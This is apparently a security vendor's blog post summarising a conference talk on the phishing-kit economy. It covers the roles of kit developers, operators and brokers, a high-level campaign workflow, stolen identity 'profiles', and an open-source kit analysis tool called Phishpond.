What is a Phishing Kit? Analysis and Tools for Threat Researchers

Phishing kits are a new clique in the cybercrime economy hallways. These products have entire communities of developers and buyers that operate like SaaS companies. In this post, we will highlight just a few of the takeaways from ZeroFox Senior Director of Threat Intelligence, Zack Allen’s 2021 RSA Conference presentation “My Phishing Kit Burnbook.” In this fascinating session, Zack reviews a year’s worth of phishing kit research, outlining organized crime groups behind these kits and presenting a new tool called Phishpond, an open-source phishing kit detection and analysis tool.

What is a Phishing Kit?

Phishing attacks are more than just a website for account takeover. There are many types of phishing attacks and the term can be overloaded. Attacks like spear phishing, vishing, malware and BEC scams are sometimes described as phishing, and each one has different end goals. However, in this post, we will focus on phishing as it pertains to cybercriminals that leverage spam campaigns with the end goal of fraudulent activity. They do this by stealing personally identifiable information (PII) and financial information via a web server deployed on the internet. Defenders, analysts and threat researchers would be familiar with a URL like the one below. 

Sample URL Indicating Phishing Activity

You might ask yourself, “Why is there protonmail/index.php at the end?” This is your first hint that you are most likely dealing with a phishing page. For the more astute researchers, you will notice that multiple directories lead to that phishing page. After navigating further, in some cases, this will bring you to open a directory up to find an open directory such as the one below. Here we see a ProtonMail directory link that will take you to the phishing site with a zip file available as well. Congratulations, you found a phishing kit! 

After downloading the zip file, you can run 7zip to list the contents of the archive and the kit may look something like the example below.

What you see here is a collection of PHP files, HTML, assets like JavaScript, CSS, PNG and text files. This is a phishing kit!

A phishing kit is preconstructed code that allows fraudsters to quickly deploy phishing sites. They are sold and traded online across the dark web, deep web, social media sites and forums. These kits have varying levels of features much like a SaaS product. Lower-priced or stolen kits are not that advanced and higher-tiered kits are more expensive and very modular. These more robust kits also include APIs, multiple ways to exfiltrate stolen data, and some even have digital rights management and licensing attached. These are very popular because they offer a high return on investment for threat actors. They allow actors to quickly stand up a phishing site without knowing the back-end controls or leveraging an advanced skill set. All that’s left for them to do is upload to a server, deploy and then actors can begin reaping the benefits from the phishing attack.

ZeroFox has been doing phishing research for quite some time. Our threat researchers have noticed that regardless of the threat actor or a group behind the activity, they tend to fall into a few buckets: operator, developer, infrastructure broker and the illicit market. 

You could be dealing with any combination of these types of personas, but the basic premise is that they all have the same goal in mind in the phishing game: to make money.

Operator 

The operator purchases the kit from the developer; they obtain different methods to spam using the kit and then they obtain stolen data to sell.

Developer 

The developer builds the kit, hosts it, takes feature requests, and keeps improving it, so more operators purchase it. 

Infrastructure Broker 

Infrastructure brokers obtain servers, accounts and email inboxes to perform some type of spam. They will do this illicitly through tactics such as carding or fraud. 

Illicit Market 

Markets are where stolen data is bought and sold. Developers, operators and brokers use markets as a hub to buy and sell inventory.

All these roles tied together are the ingredients for an “ecosystem of fraud” recipe when it comes to phishing kits.

What it Takes to Make a Phishing Campaign 

Operators perform spam campaigns in a flywheel-like fashion. The more they complete this flywheel, the faster and more efficient they get:

First, the operator identifies a place they can go to buy or sell financial information or PII. Once they figure out where they can sell stolen data, they will purchase a phishing kit along with data to help them spam, such as lists to emails or phone numbers. Sometimes they will purchase a “letter,” which is a prepackaged piece of HTML designed to get past email spam filters. 

Once those purchases are complete, the operator then deploys the kit. They get a virtual private server (VPS), and from there, they install a web server and a LAMP stack with PHP. They take their purchased zip file and copy it onto the attack server. After they copy it over and extract it, they have a payload that they build either through the letter template or a similar type of SMS spamming service to text out the phishing link. 

The campaign is initiated from here, and it’s as easy as clicking a button that then deploys a form of outreach (emails, text messages or more) where victims are directed to the phishing website. The kit excels at blocking any type of automated security scanner; meanwhile, the victim starts filling in the data actors are after. The operator collects the data several ways, which Zack details in his demo during his RSA presentation. Operators can take that information and store it to be retrieved and listed in the last “identifies” step.

Understanding Victim Workflow 

When you're researching phishing kit activity, it's essential to consider what the ZeroFox Threat Research team refers to as the “victim workflow.” This defines the user experience during the phishing attack. Compare the two Cash App screenshots below and see if you can spot which one is authentic. 

Without access to the domain or the source code, if you're not an expert analyst and most victims are not, it can be difficult to tell the difference. This is because phishing kit developers go to great lengths and spend hours to ensure the fraudulent site looks exactly like the brand they are targeting. Each page is uniquely built so threat actors can take the right information based on that brand.

Initially, you can see that it is the email and password being populated. What’s interesting is that the phishing pages that follow gather more information, including everything from the victim’s name, address, Social Security number, debit card, credit card and more. This is beyond most conceptions of what phishing attacks collect and begins to create something much more detailed and malicious. 

This complete stolen data package is what's called a profile, or “Pro,” among threat actors.  When they have this detailed package, they can sell it as a whole set of data rather than just usernames and passwords.

Security practitioners and researchers must take into consideration that phishing attacks are not limited to collecting usernames and passwords. These profiles are prepacked identity compromised toolsets. All this information stored together is very useful when attempting to compromise a victim’s financial livelihood. 

This isn’t to say this example is representative of all phishing pages or that attacks are limited to this purview, but this does show that there is a broad spectrum when it comes to phishing kits and attacks. It is essential to understand this in threat research to stay abreast of the latest threat trends and adapt security measures appropriately.

There is also a wide range of variables to consider when assessing a threat model pertaining to the organization or industry itself as well as the brands and what they offer threat actors as a target. Phishing attacks can be more complicated than most might initially think and warrant more discussion, collaboration and research within the cybersecurity community. 

Research and Defense with Phishpond

Phishpond is a resource the ZeroFox Threat Research team developed to help analyze phishing kits. This tool aims to help defenders and researchers analyze the tactics, techniques and procedures (TTPs) employed by phishing operators and developers. The tool is readily available and can be leveraged to find exfiltration endpoints quickly, identify weaknesses in phishing kits and uncover additional intelligence, fingerprint known kits or find new ones. Take a deeper dive in the pond by watching Zack’s presentation, where he demo’s the tool in several instances, and then try it for yourself! You can also download ZeroFox’s white paper “The Anatomy of a Phishing Kit: Detect and Remove Emerging Phishing Threats” to learn more about phishing kits and how this evolving threat can be tackled at scale.